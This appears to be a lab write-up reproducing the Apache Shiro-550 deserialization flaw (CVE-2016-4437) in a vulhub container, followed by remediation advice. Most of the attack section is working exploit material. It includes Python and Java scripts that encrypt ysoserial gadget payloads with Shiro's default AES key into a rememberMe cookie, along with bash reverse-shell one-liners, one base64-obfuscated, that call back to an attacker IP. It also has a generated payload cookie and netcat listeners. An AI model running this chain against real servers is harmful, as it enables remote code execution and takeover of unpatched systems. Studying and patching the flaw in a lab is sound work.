# Apache Shiro 1.2.4 Deserialization Vulnerability, Shiro-550 (CVE-2016-4437)
## 1. Vulnerability overview

### 1.1 Apache Shiro

Apache Shiro is an open-source security framework that provides authentication, authorization, cryptography and session management. The framework is intuitive and easy to use while still providing robust security.

### 1.2 Affected versions

Apache Shiro ≤ 1.2.4: all versions, including 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.x, 1.0.x and so on.

Fixed versions: 1.2.5 and above (including 1.3.x, 1.4.x, 1.5.x, 1.6.x, 1.7.x, 1.8.x and 2.x).

### 1.3 Root cause

In Shiro 1.2.4 and below, the "remember me" feature uses a fixed, hard-coded AES key, and the `rememberMe` data in the cookie is decrypted and deserialized directly, without any validation. An attacker who knows the default key can construct a malicious serialized payload and obtain remote code execution.

## 2. Environment setup

### 2.1 Building the target

```bash
# enter the directory
[root@localhost vulhub]# cd shiro
# list the directory
[root@localhost shiro]# ls
CVE-2010-3863  CVE-2016-4437  CVE-2020-1957
# enter the directory
[root@localhost shiro]# cd CVE-2016-4437/
# bring up the environment
[root@localhost CVE-2016-4437]# docker compose up -d
# check the container
[root@localhost CVE-2016-4437]# docker ps
```

### 2.2 Downloading ysoserial

```bash
# download ysoserial through the proxy
┌──(root㉿kali)-[~]
└─# proxychains wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial-all.jar
# check
┌──(root㉿kali)-[~]
└─# ls
Desktop  Documents  Downloads  EHole  Music  Pictures  Public  Templates  Videos  ysoserial-0.0.6-all.jar
# test that it runs
┌──(root㉿kali)-[~]
└─# java -jar ysoserial-all.jar
```

It took me a long time to find the download address.

### 2.3 AES encryption script

Python version:

```python
import base64
from Crypto.Cipher import AES  # pycryptodome

# read the generated poc.bin
with open("poc.bin", "rb") as f:
    payload = f.read()

# Shiro default key
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

# generate a random IV
iv = AES.new(key, AES.MODE_CBC).iv

# PKCS7 padding
def pad(s):
    bs = AES.block_size
    return s + (bs - len(s) % bs) * bytes([bs - len(s) % bs])

# encrypt
payload = pad(payload)
encrypted = AES.new(key, AES.MODE_CBC, iv).encrypt(payload)

# output the final rememberMe value (IV prepended to the ciphertext)
result = base64.b64encode(iv + encrypted).decode()
print("rememberMe=" + result)
```

Java version:

```java
package org.vulhub.shirodemo;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;

import java.nio.file.FileSystems;
import java.nio.file.Files;

public class TestRemember {
    public static void main(String[] args) throws Exception {
        // read the serialized payload
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));

        // encrypt it with the Shiro default key
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}
```

### 2.4 Generating the POC

One thing to point out: the JDK on Kali is version 21, while ysoserial needs JDK 8 to be compatible. If you do not run it with JDK 8 you will hit the problem I ran into below.

```bash
# generate the POC
┌──(root㉿kali)-[~]
└─# java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin
# install JDK 8 from the Kali repositories (it is not in the repositories, so it has to be downloaded from the official site instead)
┌──(root㉿kali)-[~]
└─# apt install openjdk-8-jdk
# use the Adoptium official API direct link
┌──(root㉿kali)-[~]
└─# proxychains wget -O jdk8.tar.gz \
https://api.adoptium.net/v3/binary/latest/8/ga/linux/x64/jdk/hotspot/normal/eclipse
# extract
┌──(root㉿kali)-[~]
└─# tar -xvf jdk8.tar.gz
# move it into place
┌──(root㉿kali)-[~]
└─# mv jdk8u492-b09 /opt/jdk8
# add an alias
┌──(root㉿kali)-[~]
└─# alias java8=/opt/jdk8/bin/java
# generate the POC
┌──(root㉿kali)-[~]
└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin
```

## 3. Reproducing the vulnerability

### 3.1 Visit the home page

### 3.2 Generate rememberMe

```bash
# generate rememberMe
┌──(root㉿kali)-[~]
└─# python shiro_exp.py
# install the pycryptodome library
┌──(root㉿kali)-[~]
└─# pip3 install pycryptodome
# newer Kali releases protect the system Python and refuse to install pip packages directly, so a flag is needed
┌──(root㉿kali)-[~]
└─# pip3 install pycryptodome --break-system-packages
┌──(root㉿kali)-[~]
└─# python shiro_exp.py
```

### 3.3 Send the attack request

First check whether a `success` file already exists inside the container:

```bash
# check the container
[root@localhost ~]# docker ps
# list the container's /tmp directory
[root@localhost ~]# docker exec 02fbc4cedb3d ls -la /tmp
```

Listing `/tmp` again shows that the file has been created: the attack succeeded.

### 3.4 Reverse shell

```bash
# TCP reverse shell examples
bash -i >& /dev/tcp/172.18.3.12/8888 0>&1
/bin/bash -i > /dev/tcp/172.18.3.12/8888 0<&1 2>&1
bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
# generate the reverse shell payload
┌──(root㉿kali)-[~]
└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > shell.ser
# replace the file name in the Python script
┌──(root㉿kali)-[~]
└─# sed -i 's/poc.bin/shell.ser/g' shiro_exp.py
# generate rememberMe
┌──(root㉿kali)-[~]
└─# python shiro_exp.py
rememberMe=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
```

Listen on port 8888 on Kali, send the request, and check whether the shell comes back:

```bash
┌──(root㉿kali)-[~]
└─# nc -lvnp 8888
listening on [any] 8888 ...
```
## 4. Other ways to reproduce

### 4.1 Shiro deserialization tool

On the attacking host, open the Shiro deserialization exploitation tool, choose `shiro550` as the vulnerability type, and enter the target address `http://192.168.88.130` in the address bar. (I rebuilt the environment at this point, which is why the IP address differs; everything else is the same.)

### 4.2 DNS out-of-band detection

CEYE is a monitoring platform for detecting out-of-band data such as DNS queries and HTTP requests. It helps security researchers collect information while testing vulnerabilities such as SSRF, XXE and RCE. If dnslog does not pick anything up, switch to CEYE; neither of the two is very stable.

### 4.3 Gadget chain succeeded

### 4.4 Reverse shell

```bash
# listen on port 8000
[root@CentOS7 ~]# nc -lvp 8000
# check privileges
root@1d7284f53b38:/# id
# check the IP address
root@1d7284f53b38:/# ip add
```

At this point the attack has succeeded. A supplementary note: the Shiro key may be the default one or some other key, so the approach is similar to brute forcing, and you can collect or download key lists specifically for this. There is also more than one tool: on Kali you can install ShiroAttack2, shiro-exploit and others, or write your own Python script.

## 5. Remediation

### 5.1 Root cause

Shiro's default hard-coded AES key (`kPH+bIxk5D2deZiIxcaaaA==`) is publicly known, CBC mode is used, and the deserialization is unchecked; an attacker can construct a malicious `rememberMe` cookie to trigger deserialization and RCE.

### 5.2 Main fixes

- Stop using the default key: generate a strong random Base64 key and configure it in `shiro.ini`/`.yml`.
- Upgrade to 1.2.7 or above (the 1.3.x / 2.x stable releases are recommended).
- If the business does not need it, disable `rememberMe` outright and remove the attack surface at the root.

### 5.3 Operational protection

- Add WAF rules that block oversized `rememberMe` cookies and known payload signatures.
- Scan assets regularly for the Shiro fingerprint and the default key.
- Run the server with least privilege to reduce the damage after an RCE.
- Restrict external access to back-office management interfaces.

## 6. References

- Detailed analysis of the Shiro deserialization vulnerability: https://www.anquanke.com/post/id/228889
- Shiro deserialization analysis, with approach and component detection notes: https://xz.aliyun.com/t/8997
- Introduction to Shiro and its main flow: https://www.cnblogs.com/insaneXs/p/10999384.html
- https://github.com/vulhub/vulhub/blob/master/shiro/CVE-2016-4437/README.zh-cn.md